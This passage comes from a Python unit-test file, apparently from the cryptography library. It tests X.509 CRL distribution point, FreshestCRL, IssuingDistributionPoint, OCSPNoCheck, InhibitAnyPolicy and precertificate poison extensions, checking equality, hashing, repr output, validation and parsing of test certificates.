dp = x509.DistributionPoint(
None,
x509.RelativeDistinguishedName(
[x509.NameAttribute(NameOID.COMMON_NAME, "myCN")]
),
frozenset([x509.ReasonFlags.ca_compromise]),
[
x509.DirectoryName(
x509.Name(
[
x509.NameAttribute(
NameOID.COMMON_NAME, "Important CA"
)
]
)
)
],
)
assert repr(dp) == (
"<DistributionPoint(full_name=None, relative_name=<RelativeDis"
"tinguishedName(CN=myCN)>, reasons=frozenset({<ReasonFlags.ca_"
"compromise: 'cACompromise'>}), crl_issuer=[<DirectoryName(val"
"ue=<Name(CN=Important CA)>)>])>"
)
def test_hash(self):
dp = x509.DistributionPoint(
[x509.UniformResourceIdentifier("http://crypt.og/crl")],
None,
frozenset([x509.ReasonFlags.superseded]),
[
x509.DirectoryName(
x509.Name(
[
x509.NameAttribute(
NameOID.COMMON_NAME, "Important CA"
)
]
)
)
],
)
dp2 = x509.DistributionPoint(
[x509.UniformResourceIdentifier("http://crypt.og/crl")],
None,
frozenset([x509.ReasonFlags.superseded]),
[
x509.DirectoryName(
x509.Name(
[
x509.NameAttribute(
NameOID.COMMON_NAME, "Important CA"
)
]
)
)
],
)
dp3 = x509.DistributionPoint(
None,
x509.RelativeDistinguishedName(
[x509.NameAttribute(NameOID.COMMON_NAME, "myCN")]
),
None,
None,
)
assert hash(dp) == hash(dp2)
assert hash(dp) != hash(dp3)
class TestFreshestCRL(object):
def test_invalid_distribution_points(self):
with pytest.raises(TypeError):
x509.FreshestCRL(
["notadistributionpoint"] # type:ignore[list-item]
)
def test_iter_len(self):
fcrl = x509.FreshestCRL(
[
x509.DistributionPoint(
[x509.UniformResourceIdentifier("http://domain")],
None,
None,
None,
),
]
)
assert len(fcrl) == 1
assert list(fcrl) == [
x509.DistributionPoint(
[x509.UniformResourceIdentifier("http://domain")],
None,
None,
None,
),
]
def test_iter_input(self):
points = [
x509.DistributionPoint(
[x509.UniformResourceIdentifier("http://domain")],
None,
None,
None,
),
]
fcrl = x509.FreshestCRL(iter(points))
assert list(fcrl) == points
def test_repr(self):
fcrl = x509.FreshestCRL(
[
x509.DistributionPoint(
[x509.UniformResourceIdentifier("ftp://domain")],
None,
frozenset([x509.ReasonFlags.key_compromise]),
None,
),
]
)
assert repr(fcrl) == (
"<FreshestCRL([<DistributionPoint(full_name=[<Unifo"
"rmResourceIdentifier(value='ftp://domain')>], relative"
"_name=None, reasons=frozenset({<ReasonFlags.key_compromise: "
"'keyCompromise'>}), crl_issuer=None)>])>"
)
def test_eq(self):
fcrl = x509.FreshestCRL(
[
x509.DistributionPoint(
[x509.UniformResourceIdentifier("ftp://domain")],
None,
frozenset(
[
x509.ReasonFlags.key_compromise,
x509.ReasonFlags.ca_compromise,
]
),
[x509.UniformResourceIdentifier("uri://thing")],
),
]
)
fcrl2 = x509.FreshestCRL(
[
x509.DistributionPoint(
[x509.UniformResourceIdentifier("ftp://domain")],
None,
frozenset(
[
x509.ReasonFlags.key_compromise,
x509.ReasonFlags.ca_compromise,
]
),
[x509.UniformResourceIdentifier("uri://thing")],
),
]
)
assert fcrl == fcrl2
def test_ne(self):
fcrl = x509.FreshestCRL(
[
x509.DistributionPoint(
[x509.UniformResourceIdentifier("ftp://domain")],
None,
frozenset(
[
x509.ReasonFlags.key_compromise,
x509.ReasonFlags.ca_compromise,
]
),
[x509.UniformResourceIdentifier("uri://thing")],
),
]
)
fcrl2 = x509.FreshestCRL(
[
x509.DistributionPoint(
[x509.UniformResourceIdentifier("ftp://domain2")],
None,
frozenset(
[
x509.ReasonFlags.key_compromise,
x509.ReasonFlags.ca_compromise,
]
),
[x509.UniformResourceIdentifier("uri://thing")],
),
]
)
fcrl3 = x509.FreshestCRL(
[
x509.DistributionPoint(
[x509.UniformResourceIdentifier("ftp://domain")],
None,
frozenset([x509.ReasonFlags.key_compromise]),
[x509.UniformResourceIdentifier("uri://thing")],
),
]
)
fcrl4 = x509.FreshestCRL(
[
x509.DistributionPoint(
[x509.UniformResourceIdentifier("ftp://domain")],
None,
frozenset(
[
x509.ReasonFlags.key_compromise,
x509.ReasonFlags.ca_compromise,
]
),
[x509.UniformResourceIdentifier("uri://thing2")],
),
]
)
assert fcrl != fcrl2
assert fcrl != fcrl3
assert fcrl != fcrl4
assert fcrl != object()
def test_hash(self):
fcrl = x509.FreshestCRL(
[
x509.DistributionPoint(
[x509.UniformResourceIdentifier("ftp://domain")],
None,
frozenset(
[
x509.ReasonFlags.key_compromise,
x509.ReasonFlags.ca_compromise,
]
),
[x509.UniformResourceIdentifier("uri://thing")],
),
]
)
fcrl2 = x509.FreshestCRL(
[
x509.DistributionPoint(
[x509.UniformResourceIdentifier("ftp://domain")],
None,
frozenset(
[
x509.ReasonFlags.key_compromise,
x509.ReasonFlags.ca_compromise,
]
),
[x509.UniformResourceIdentifier("uri://thing")],
),
]
)
fcrl3 = x509.FreshestCRL(
[
x509.DistributionPoint(
[x509.UniformResourceIdentifier("ftp://domain")],
None,
frozenset([x509.ReasonFlags.key_compromise]),
[x509.UniformResourceIdentifier("uri://thing")],
),
]
)
assert hash(fcrl) == hash(fcrl2)
assert hash(fcrl) != hash(fcrl3)
def test_indexing(self):
fcrl = x509.FreshestCRL(
[
x509.DistributionPoint(
None,
None,
None,
[x509.UniformResourceIdentifier("uri://thing")],
),
x509.DistributionPoint(
None,
None,
None,
[x509.UniformResourceIdentifier("uri://thing2")],
),
x509.DistributionPoint(
None,
None,
None,
[x509.UniformResourceIdentifier("uri://thing3")],
),
x509.DistributionPoint(
None,
None,
None,
[x509.UniformResourceIdentifier("uri://thing4")],
),
x509.DistributionPoint(
None,
None,
None,
[x509.UniformResourceIdentifier("uri://thing5")],
),
]
)
assert fcrl[-1] == fcrl[4]
assert fcrl[2:6:2] == [fcrl[2], fcrl[4]]
class TestCRLDistributionPoints(object):
def test_invalid_distribution_points(self):
with pytest.raises(TypeError):
x509.CRLDistributionPoints(
["notadistributionpoint"], # type:ignore[list-item]
)
def test_iter_len(self):
cdp = x509.CRLDistributionPoints(
[
x509.DistributionPoint(
[x509.UniformResourceIdentifier("http://domain")],
None,
None,
None,
),
x509.DistributionPoint(
[x509.UniformResourceIdentifier("ftp://domain")],
None,
frozenset(
[
x509.ReasonFlags.key_compromise,
x509.ReasonFlags.ca_compromise,
]
),
None,
),
]
)
assert len(cdp) == 2
assert list(cdp) == [
x509.DistributionPoint(
[x509.UniformResourceIdentifier("http://domain")],
None,
None,
None,
),
x509.DistributionPoint(
[x509.UniformResourceIdentifier("ftp://domain")],
None,
frozenset(
[
x509.ReasonFlags.key_compromise,
x509.ReasonFlags.ca_compromise,
]
),
None,
),
]
def test_iter_input(self):
points = [
x509.DistributionPoint(
[x509.UniformResourceIdentifier("http://domain")],
None,
None,
None,
),
]
cdp = x509.CRLDistributionPoints(iter(points))
assert list(cdp) == points
def test_repr(self):
cdp = x509.CRLDistributionPoints(
[
x509.DistributionPoint(
[x509.UniformResourceIdentifier("ftp://domain")],
None,
frozenset([x509.ReasonFlags.key_compromise]),
None,
),
]
)
assert repr(cdp) == (
"<CRLDistributionPoints([<DistributionPoint(full_name=[<Unifo"
"rmResourceIdentifier(value='ftp://domain')>], relative"
"_name=None, reasons=frozenset({<ReasonFlags.key_compromise: "
"'keyCompromise'>}), crl_issuer=None)>])>"
)
def test_eq(self):
cdp = x509.CRLDistributionPoints(
[
x509.DistributionPoint(
[x509.UniformResourceIdentifier("ftp://domain")],
None,
frozenset(
[
x509.ReasonFlags.key_compromise,
x509.ReasonFlags.ca_compromise,
]
),
[x509.UniformResourceIdentifier("uri://thing")],
),
]
)
cdp2 = x509.CRLDistributionPoints(
[
x509.DistributionPoint(
[x509.UniformResourceIdentifier("ftp://domain")],
None,
frozenset(
[
x509.ReasonFlags.key_compromise,
x509.ReasonFlags.ca_compromise,
]
),
[x509.UniformResourceIdentifier("uri://thing")],
),
]
)
assert cdp == cdp2
def test_ne(self):
cdp = x509.CRLDistributionPoints(
[
x509.DistributionPoint(
[x509.UniformResourceIdentifier("ftp://domain")],
None,
frozenset(
[
x509.ReasonFlags.key_compromise,
x509.ReasonFlags.ca_compromise,
]
),
[x509.UniformResourceIdentifier("uri://thing")],
),
]
)
cdp2 = x509.CRLDistributionPoints(
[
x509.DistributionPoint(
[x509.UniformResourceIdentifier("ftp://domain2")],
None,
frozenset(
[
x509.ReasonFlags.key_compromise,
x509.ReasonFlags.ca_compromise,
]
),
[x509.UniformResourceIdentifier("uri://thing")],
),
]
)
cdp3 = x509.CRLDistributionPoints(
[
x509.DistributionPoint(
[x509.UniformResourceIdentifier("ftp://domain")],
None,
frozenset([x509.ReasonFlags.key_compromise]),
[x509.UniformResourceIdentifier("uri://thing")],
),
]
)
cdp4 = x509.CRLDistributionPoints(
[
x509.DistributionPoint(
[x509.UniformResourceIdentifier("ftp://domain")],
None,
frozenset(
[
x509.ReasonFlags.key_compromise,
x509.ReasonFlags.ca_compromise,
]
),
[x509.UniformResourceIdentifier("uri://thing2")],
),
]
)
assert cdp != cdp2
assert cdp != cdp3
assert cdp != cdp4
assert cdp != object()
def test_hash(self):
cdp = x509.CRLDistributionPoints(
[
x509.DistributionPoint(
[x509.UniformResourceIdentifier("ftp://domain")],
None,
frozenset(
[
x509.ReasonFlags.key_compromise,
x509.ReasonFlags.ca_compromise,
]
),
[x509.UniformResourceIdentifier("uri://thing")],
),
]
)
cdp2 = x509.CRLDistributionPoints(
[
x509.DistributionPoint(
[x509.UniformResourceIdentifier("ftp://domain")],
None,
frozenset(
[
x509.ReasonFlags.key_compromise,
x509.ReasonFlags.ca_compromise,
]
),
[x509.UniformResourceIdentifier("uri://thing")],
),
]
)
cdp3 = x509.CRLDistributionPoints(
[
x509.DistributionPoint(
[x509.UniformResourceIdentifier("ftp://domain")],
None,
frozenset([x509.ReasonFlags.key_compromise]),
[x509.UniformResourceIdentifier("uri://thing")],
),
]
)
assert hash(cdp) == hash(cdp2)
assert hash(cdp) != hash(cdp3)
def test_indexing(self):
ci = x509.CRLDistributionPoints(
[
x509.DistributionPoint(
None,
None,
None,
[x509.UniformResourceIdentifier("uri://thing")],
),
x509.DistributionPoint(
None,
None,
None,
[x509.UniformResourceIdentifier("uri://thing2")],
),
x509.DistributionPoint(
None,
None,
None,
[x509.UniformResourceIdentifier("uri://thing3")],
),
x509.DistributionPoint(
None,
None,
None,
[x509.UniformResourceIdentifier("uri://thing4")],
),
x509.DistributionPoint(
None,
None,
None,
[x509.UniformResourceIdentifier("uri://thing5")],
),
]
)
assert ci[-1] == ci[4]
assert ci[2:6:2] == [ci[2], ci[4]]
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
class TestCRLDistributionPointsExtension(object):
def test_fullname_and_crl_issuer(self, backend):
cert = _load_cert(
os.path.join(
"x509", "PKITS_data", "certs", "ValidcRLIssuerTest28EE.crt"
),
x509.load_der_x509_certificate,
backend,
)
cdps = cert.extensions.get_extension_for_oid(
ExtensionOID.CRL_DISTRIBUTION_POINTS
).value
assert cdps == x509.CRLDistributionPoints(
[
x509.DistributionPoint(
full_name=[
x509.DirectoryName(
x509.Name(
[
x509.NameAttribute(
NameOID.COUNTRY_NAME, "US"
),
x509.NameAttribute(
NameOID.ORGANIZATION_NAME,
"Test Certificates 2011",
),
x509.NameAttribute(
NameOID.ORGANIZATIONAL_UNIT_NAME,
"indirectCRL CA3 cRLIssuer",
),
x509.NameAttribute(
NameOID.COMMON_NAME,
"indirect CRL for indirectCRL CA3",
),
]
)
)
],
relative_name=None,
reasons=None,
crl_issuer=[
x509.DirectoryName(
x509.Name(
[
x509.NameAttribute(
NameOID.COUNTRY_NAME, "US"
),
x509.NameAttribute(
NameOID.ORGANIZATION_NAME,
"Test Certificates 2011",
),
x509.NameAttribute(
NameOID.ORGANIZATIONAL_UNIT_NAME,
"indirectCRL CA3 cRLIssuer",
),
]
)
)
],
)
]
)
def test_relativename_and_crl_issuer(self, backend):
cert = _load_cert(
os.path.join(
"x509", "PKITS_data", "certs", "ValidcRLIssuerTest29EE.crt"
),
x509.load_der_x509_certificate,
backend,
)
cdps = cert.extensions.get_extension_for_oid(
ExtensionOID.CRL_DISTRIBUTION_POINTS
).value
assert cdps == x509.CRLDistributionPoints(
[
x509.DistributionPoint(
full_name=None,
relative_name=x509.RelativeDistinguishedName(
[
x509.NameAttribute(
NameOID.COMMON_NAME,
"indirect CRL for indirectCRL CA3",
),
]
),
reasons=None,
crl_issuer=[
x509.DirectoryName(
x509.Name(
[
x509.NameAttribute(
NameOID.COUNTRY_NAME, "US"
),
x509.NameAttribute(
NameOID.ORGANIZATION_NAME,
"Test Certificates 2011",
),
x509.NameAttribute(
NameOID.ORGANIZATIONAL_UNIT_NAME,
"indirectCRL CA3 cRLIssuer",
),
]
)
)
],
)
]
)
def test_fullname_crl_issuer_reasons(self, backend):
cert = _load_cert(
os.path.join(
"x509", "custom", "cdp_fullname_reasons_crl_issuer.pem"
),
x509.load_pem_x509_certificate,
backend,
)
cdps = cert.extensions.get_extension_for_oid(
ExtensionOID.CRL_DISTRIBUTION_POINTS
).value
assert cdps == x509.CRLDistributionPoints(
[
x509.DistributionPoint(
full_name=[
x509.UniformResourceIdentifier(
"http://myhost.com/myca.crl"
)
],
relative_name=None,
reasons=frozenset(
[
x509.ReasonFlags.key_compromise,
x509.ReasonFlags.ca_compromise,
]
),
crl_issuer=[
x509.DirectoryName(
x509.Name(
[
x509.NameAttribute(
NameOID.COUNTRY_NAME, "US"
),
x509.NameAttribute(
NameOID.ORGANIZATION_NAME, "PyCA"
),
x509.NameAttribute(
NameOID.COMMON_NAME, "cryptography CA"
),
]
)
)
],
)
]
)
def test_all_reasons(self, backend):
cert = _load_cert(
os.path.join("x509", "custom", "cdp_all_reasons.pem"),
x509.load_pem_x509_certificate,
backend,
)
cdps = cert.extensions.get_extension_for_oid(
ExtensionOID.CRL_DISTRIBUTION_POINTS
).value
assert cdps == x509.CRLDistributionPoints(
[
x509.DistributionPoint(
full_name=[
x509.UniformResourceIdentifier(
"http://domain.com/some.crl"
)
],
relative_name=None,
reasons=frozenset(
[
x509.ReasonFlags.key_compromise,
x509.ReasonFlags.ca_compromise,
x509.ReasonFlags.affiliation_changed,
x509.ReasonFlags.superseded,
x509.ReasonFlags.privilege_withdrawn,
x509.ReasonFlags.cessation_of_operation,
x509.ReasonFlags.aa_compromise,
x509.ReasonFlags.certificate_hold,
]
),
crl_issuer=None,
)
]
)
def test_single_reason(self, backend):
cert = _load_cert(
os.path.join("x509", "custom", "cdp_reason_aa_compromise.pem"),
x509.load_pem_x509_certificate,
backend,
)
cdps = cert.extensions.get_extension_for_oid(
ExtensionOID.CRL_DISTRIBUTION_POINTS
).value
assert cdps == x509.CRLDistributionPoints(
[
x509.DistributionPoint(
full_name=[
x509.UniformResourceIdentifier(
"http://domain.com/some.crl"
)
],
relative_name=None,
reasons=frozenset([x509.ReasonFlags.aa_compromise]),
crl_issuer=None,
)
]
)
def test_crl_issuer_only(self, backend):
cert = _load_cert(
os.path.join("x509", "custom", "cdp_crl_issuer.pem"),
x509.load_pem_x509_certificate,
backend,
)
cdps = cert.extensions.get_extension_for_oid(
ExtensionOID.CRL_DISTRIBUTION_POINTS
).value
assert cdps == x509.CRLDistributionPoints(
[
x509.DistributionPoint(
full_name=None,
relative_name=None,
reasons=None,
crl_issuer=[
x509.DirectoryName(
x509.Name(
[
x509.NameAttribute(
NameOID.COMMON_NAME, "cryptography CA"
),
]
)
)
],
)
]
)
def test_crl_empty_hostname(self, backend):
cert = _load_cert(
os.path.join("x509", "custom", "cdp_empty_hostname.pem"),
x509.load_pem_x509_certificate,
backend,
)
cdps = cert.extensions.get_extension_for_oid(
ExtensionOID.CRL_DISTRIBUTION_POINTS
).value
assert cdps == x509.CRLDistributionPoints(
[
x509.DistributionPoint(
full_name=[
x509.UniformResourceIdentifier(
"ldap:///CN=A,OU=B,dc=C,DC=D?E?F?G?H=I"
)
],
relative_name=None,
reasons=None,
crl_issuer=None,
)
]
)
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
class TestFreshestCRLExtension(object):
def test_vector(self, backend):
cert = _load_cert(
os.path.join("x509", "custom", "freshestcrl.pem"),
x509.load_pem_x509_certificate,
backend,
)
fcrl = cert.extensions.get_extension_for_class(x509.FreshestCRL).value
assert fcrl == x509.FreshestCRL(
[
x509.DistributionPoint(
full_name=[
x509.UniformResourceIdentifier(
"http://myhost.com/myca.crl"
),
x509.UniformResourceIdentifier(
"http://backup.myhost.com/myca.crl"
),
],
relative_name=None,
reasons=frozenset(
[
x509.ReasonFlags.ca_compromise,
x509.ReasonFlags.key_compromise,
]
),
crl_issuer=[
x509.DirectoryName(
x509.Name(
[
x509.NameAttribute(
NameOID.COUNTRY_NAME, "US"
),
x509.NameAttribute(
NameOID.COMMON_NAME, "cryptography CA"
),
]
)
)
],
)
]
)
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
class TestOCSPNoCheckExtension(object):
def test_nocheck(self, backend):
cert = _load_cert(
os.path.join("x509", "custom", "ocsp_nocheck.pem"),
x509.load_pem_x509_certificate,
backend,
)
ext = cert.extensions.get_extension_for_oid(ExtensionOID.OCSP_NO_CHECK)
assert isinstance(ext.value, x509.OCSPNoCheck)
def test_eq(self):
onc1 = x509.OCSPNoCheck()
onc2 = x509.OCSPNoCheck()
assert onc1 == onc2
def test_hash(self):
onc1 = x509.OCSPNoCheck()
onc2 = x509.OCSPNoCheck()
assert hash(onc1) == hash(onc2)
def test_ne(self):
onc1 = x509.OCSPNoCheck()
onc2 = x509.OCSPNoCheck()
assert onc1 == onc2
assert (onc1 != onc2) is False
assert onc1 != object()
def test_repr(self):
onc = x509.OCSPNoCheck()
assert repr(onc) == "<OCSPNoCheck()>"
class TestInhibitAnyPolicy(object):
def test_not_int(self):
with pytest.raises(TypeError):
x509.InhibitAnyPolicy("notint") # type:ignore[arg-type]
def test_negative_int(self):
with pytest.raises(ValueError):
x509.InhibitAnyPolicy(-1)
def test_repr(self):
iap = x509.InhibitAnyPolicy(0)
assert repr(iap) == "<InhibitAnyPolicy(skip_certs=0)>"
def test_eq(self):
iap = x509.InhibitAnyPolicy(1)
iap2 = x509.InhibitAnyPolicy(1)
assert iap == iap2
def test_ne(self):
iap = x509.InhibitAnyPolicy(1)
iap2 = x509.InhibitAnyPolicy(4)
assert iap != iap2
assert iap != object()
def test_hash(self):
iap = x509.InhibitAnyPolicy(1)
iap2 = x509.InhibitAnyPolicy(1)
iap3 = x509.InhibitAnyPolicy(4)
assert hash(iap) == hash(iap2)
assert hash(iap) != hash(iap3)
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
class TestInhibitAnyPolicyExtension(object):
def test_inhibit_any_policy(self, backend):
cert = _load_cert(
os.path.join("x509", "custom", "inhibit_any_policy_5.pem"),
x509.load_pem_x509_certificate,
backend,
)
iap = cert.extensions.get_extension_for_oid(
ExtensionOID.INHIBIT_ANY_POLICY
).value
assert iap.skip_certs == 5
class TestIssuingDistributionPointExtension(object):
@pytest.mark.parametrize(
("filename", "expected"),
[
(
"crl_idp_fullname_indirect_crl.pem",
x509.IssuingDistributionPoint(
full_name=[
x509.UniformResourceIdentifier(
"http://myhost.com/myca.crl"
)
],
relative_name=None,
only_contains_user_certs=False,
only_contains_ca_certs=False,
only_some_reasons=None,
indirect_crl=True,
only_contains_attribute_certs=False,
),
),
(
"crl_idp_fullname_only.pem",
x509.IssuingDistributionPoint(
full_name=[
x509.UniformResourceIdentifier(
"http://myhost.com/myca.crl"
)
],
relative_name=None,
only_contains_user_certs=False,
only_contains_ca_certs=False,
only_some_reasons=None,
indirect_crl=False,
only_contains_attribute_certs=False,
),
),
(
"crl_idp_fullname_only_aa.pem",
x509.IssuingDistributionPoint(
full_name=[
x509.UniformResourceIdentifier(
"http://myhost.com/myca.crl"
)
],
relative_name=None,
only_contains_user_certs=False,
only_contains_ca_certs=False,
only_some_reasons=None,
indirect_crl=False,
only_contains_attribute_certs=True,
),
),
(
"crl_idp_fullname_only_user.pem",
x509.IssuingDistributionPoint(
full_name=[
x509.UniformResourceIdentifier(
"http://myhost.com/myca.crl"
)
],
relative_name=None,
only_contains_user_certs=True,
only_contains_ca_certs=False,
only_some_reasons=None,
indirect_crl=False,
only_contains_attribute_certs=False,
),
),
(
"crl_idp_only_ca.pem",
x509.IssuingDistributionPoint(
full_name=None,
relative_name=x509.RelativeDistinguishedName(
[
x509.NameAttribute(
oid=x509.NameOID.ORGANIZATION_NAME,
value="PyCA",
)
]
),
only_contains_user_certs=False,
only_contains_ca_certs=True,
only_some_reasons=None,
indirect_crl=False,
only_contains_attribute_certs=False,
),
),
(
"crl_idp_reasons_only.pem",
x509.IssuingDistributionPoint(
full_name=None,
relative_name=None,
only_contains_user_certs=False,
only_contains_ca_certs=False,
only_some_reasons=frozenset(
[x509.ReasonFlags.key_compromise]
),
indirect_crl=False,
only_contains_attribute_certs=False,
),
),
(
"crl_idp_relative_user_all_reasons.pem",
x509.IssuingDistributionPoint(
full_name=None,
relative_name=x509.RelativeDistinguishedName(
[
x509.NameAttribute(
oid=x509.NameOID.ORGANIZATION_NAME,
value="PyCA",
)
]
),
only_contains_user_certs=True,
only_contains_ca_certs=False,
only_some_reasons=frozenset(
[
x509.ReasonFlags.key_compromise,
x509.ReasonFlags.ca_compromise,
x509.ReasonFlags.affiliation_changed,
x509.ReasonFlags.superseded,
x509.ReasonFlags.cessation_of_operation,
x509.ReasonFlags.certificate_hold,
x509.ReasonFlags.privilege_withdrawn,
x509.ReasonFlags.aa_compromise,
]
),
indirect_crl=False,
only_contains_attribute_certs=False,
),
),
(
"crl_idp_relativename_only.pem",
x509.IssuingDistributionPoint(
full_name=None,
relative_name=x509.RelativeDistinguishedName(
[
x509.NameAttribute(
oid=x509.NameOID.ORGANIZATION_NAME,
value="PyCA",
)
]
),
only_contains_user_certs=False,
only_contains_ca_certs=False,
only_some_reasons=None,
indirect_crl=False,
only_contains_attribute_certs=False,
),
),
],
)
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
def test_vectors(self, filename, expected, backend):
crl = _load_cert(
os.path.join("x509", "custom", filename),
x509.load_pem_x509_crl,
backend,
)
idp = crl.extensions.get_extension_for_class(
x509.IssuingDistributionPoint
).value
assert idp == expected
@pytest.mark.parametrize(
(
"error",
"only_contains_user_certs",
"only_contains_ca_certs",
"indirect_crl",
"only_contains_attribute_certs",
"only_some_reasons",
"full_name",
"relative_name",
),
[
(
TypeError,
False,
False,
False,
False,
"notafrozenset",
None,
None,
),
(
TypeError,
False,
False,
False,
False,
frozenset(["bad"]),
None,
None,
),
(
ValueError,
False,
False,
False,
False,
frozenset([x509.ReasonFlags.unspecified]),
None,
None,
),
(
ValueError,
False,
False,
False,
False,
frozenset([x509.ReasonFlags.remove_from_crl]),
None,
None,
),
(TypeError, "notabool", False, False, False, None, None, None),
(TypeError, False, "notabool", False, False, None, None, None),
(TypeError, False, False, "notabool", False, None, None, None),
(TypeError, False, False, False, "notabool", None, None, None),
(ValueError, True, True, False, False, None, None, None),
(ValueError, False, False, True, True, None, None, None),
(ValueError, False, False, False, False, None, None, None),
],
)
def test_invalid_init(
self,
error,
only_contains_user_certs,
only_contains_ca_certs,
indirect_crl,
only_contains_attribute_certs,
only_some_reasons,
full_name,
relative_name,
):
with pytest.raises(error):
x509.IssuingDistributionPoint(
full_name,
relative_name,
only_contains_user_certs,
only_contains_ca_certs,
only_some_reasons,
indirect_crl,
only_contains_attribute_certs,
)
def test_repr(self):
idp = x509.IssuingDistributionPoint(
None,
None,
False,
False,
frozenset([x509.ReasonFlags.key_compromise]),
False,
False,
)
assert repr(idp) == (
"<IssuingDistributionPoint(full_name=None, relative_name=None,"
" only_contains_user_certs=False, only_contains_ca_certs=False"
", only_some_reasons=frozenset({<ReasonFlags.key_compromise: '"
"keyCompromise'>}), indirect_crl=False, only_contains_attribut"
"e_certs=False)>"
)
def test_eq(self):
idp1 = x509.IssuingDistributionPoint(
only_contains_user_certs=False,
only_contains_ca_certs=False,
indirect_crl=False,
only_contains_attribute_certs=False,
only_some_reasons=None,
full_name=None,
relative_name=x509.RelativeDistinguishedName(
[
x509.NameAttribute(
oid=x509.NameOID.ORGANIZATION_NAME, value="PyCA"
)
]
),
)
idp2 = x509.IssuingDistributionPoint(
only_contains_user_certs=False,
only_contains_ca_certs=False,
indirect_crl=False,
only_contains_attribute_certs=False,
only_some_reasons=None,
full_name=None,
relative_name=x509.RelativeDistinguishedName(
[
x509.NameAttribute(
oid=x509.NameOID.ORGANIZATION_NAME, value="PyCA"
)
]
),
)
assert idp1 == idp2
def test_ne(self):
idp1 = x509.IssuingDistributionPoint(
only_contains_user_certs=False,
only_contains_ca_certs=False,
indirect_crl=False,
only_contains_attribute_certs=False,
only_some_reasons=None,
full_name=None,
relative_name=x509.RelativeDistinguishedName(
[
x509.NameAttribute(
oid=x509.NameOID.ORGANIZATION_NAME, value="PyCA"
)
]
),
)
idp2 = x509.IssuingDistributionPoint(
only_contains_user_certs=True,
only_contains_ca_certs=False,
indirect_crl=False,
only_contains_attribute_certs=False,
only_some_reasons=None,
full_name=None,
relative_name=x509.RelativeDistinguishedName(
[
x509.NameAttribute(
oid=x509.NameOID.ORGANIZATION_NAME, value="PyCA"
)
]
),
)
assert idp1 != idp2
assert idp1 != object()
def test_hash(self):
idp1 = x509.IssuingDistributionPoint(
None, None, True, False, None, False, False
)
idp2 = x509.IssuingDistributionPoint(
None, None, True, False, None, False, False
)
idp3 = x509.IssuingDistributionPoint(
None,
x509.RelativeDistinguishedName(
[
x509.NameAttribute(
oid=x509.NameOID.ORGANIZATION_NAME, value="PyCA"
)
]
),
True,
False,
None,
False,
False,
)
assert hash(idp1) == hash(idp2)
assert hash(idp1) != hash(idp3)
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
@pytest.mark.parametrize(
"idp",
[
x509.IssuingDistributionPoint(
full_name=[
x509.UniformResourceIdentifier(
"http://myhost.com/myca.crl"
)
],
relative_name=None,
only_contains_user_certs=False,
only_contains_ca_certs=False,
only_some_reasons=None,
indirect_crl=True,
only_contains_attribute_certs=False,
),
x509.IssuingDistributionPoint(
full_name=[
x509.UniformResourceIdentifier(
"http://myhost.com/myca.crl"
)
],
relative_name=None,
only_contains_user_certs=False,
only_contains_ca_certs=False,
only_some_reasons=None,
indirect_crl=False,
only_contains_attribute_certs=False,
),
x509.IssuingDistributionPoint(
full_name=[
x509.UniformResourceIdentifier(
"http://myhost.com/myca.crl"
)
],
relative_name=None,
only_contains_user_certs=False,
only_contains_ca_certs=False,
only_some_reasons=None,
indirect_crl=False,
only_contains_attribute_certs=True,
),
x509.IssuingDistributionPoint(
full_name=[
x509.UniformResourceIdentifier(
"http://myhost.com/myca.crl"
)
],
relative_name=None,
only_contains_user_certs=True,
only_contains_ca_certs=False,
only_some_reasons=None,
indirect_crl=False,
only_contains_attribute_certs=False,
),
x509.IssuingDistributionPoint(
full_name=None,
relative_name=x509.RelativeDistinguishedName(
[
x509.NameAttribute(
oid=x509.NameOID.ORGANIZATION_NAME, value="PyCA"
)
]
),
only_contains_user_certs=False,
only_contains_ca_certs=True,
only_some_reasons=None,
indirect_crl=False,
only_contains_attribute_certs=False,
),
x509.IssuingDistributionPoint(
full_name=None,
relative_name=None,
only_contains_user_certs=False,
only_contains_ca_certs=True,
only_some_reasons=frozenset([x509.ReasonFlags.key_compromise]),
indirect_crl=False,
only_contains_attribute_certs=False,
),
x509.IssuingDistributionPoint(
full_name=None,
relative_name=x509.RelativeDistinguishedName(
[
x509.NameAttribute(
oid=x509.NameOID.ORGANIZATION_NAME, value="PyCA"
),
x509.NameAttribute(
oid=x509.NameOID.COMMON_NAME, value="cryptography"
),
]
),
only_contains_user_certs=True,
only_contains_ca_certs=False,
only_some_reasons=frozenset(
[
x509.ReasonFlags.key_compromise,
x509.ReasonFlags.ca_compromise,
x509.ReasonFlags.affiliation_changed,
x509.ReasonFlags.privilege_withdrawn,
x509.ReasonFlags.aa_compromise,
]
),
indirect_crl=False,
only_contains_attribute_certs=False,
),
x509.IssuingDistributionPoint(
full_name=None,
relative_name=x509.RelativeDistinguishedName(
[
x509.NameAttribute(
oid=x509.NameOID.ORGANIZATION_NAME, value="PyCA"
)
]
),
only_contains_user_certs=False,
only_contains_ca_certs=False,
only_some_reasons=None,
indirect_crl=False,
only_contains_attribute_certs=False,
),
],
)
def test_generate(self, idp, backend):
key = RSA_KEY_2048.private_key(backend)
last_update = datetime.datetime(2002, 1, 1, 12, 1)
next_update = datetime.datetime(2030, 1, 1, 12, 1)
builder = (
x509.CertificateRevocationListBuilder()
.issuer_name(
x509.Name(
[
x509.NameAttribute(
NameOID.COMMON_NAME, "cryptography.io CA"
)
]
)
)
.last_update(last_update)
.next_update(next_update)
.add_extension(idp, True)
)
crl = builder.sign(key, hashes.SHA256(), backend)
ext = crl.extensions.get_extension_for_class(
x509.IssuingDistributionPoint
)
assert ext.critical is True
assert ext.value == idp
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
class TestPrecertPoisonExtension(object):
def test_load(self, backend):
cert = _load_cert(
os.path.join("x509", "cryptography.io.precert.pem"),
x509.load_pem_x509_certificate,
backend,
)
poison = cert.extensions.get_extension_for_oid(
ExtensionOID.PRECERT_POISON
).value
assert isinstance(poison, x509.PrecertPoison)
poison = cert.extensions.get_extension_for_class(
x509.PrecertPoison
).value
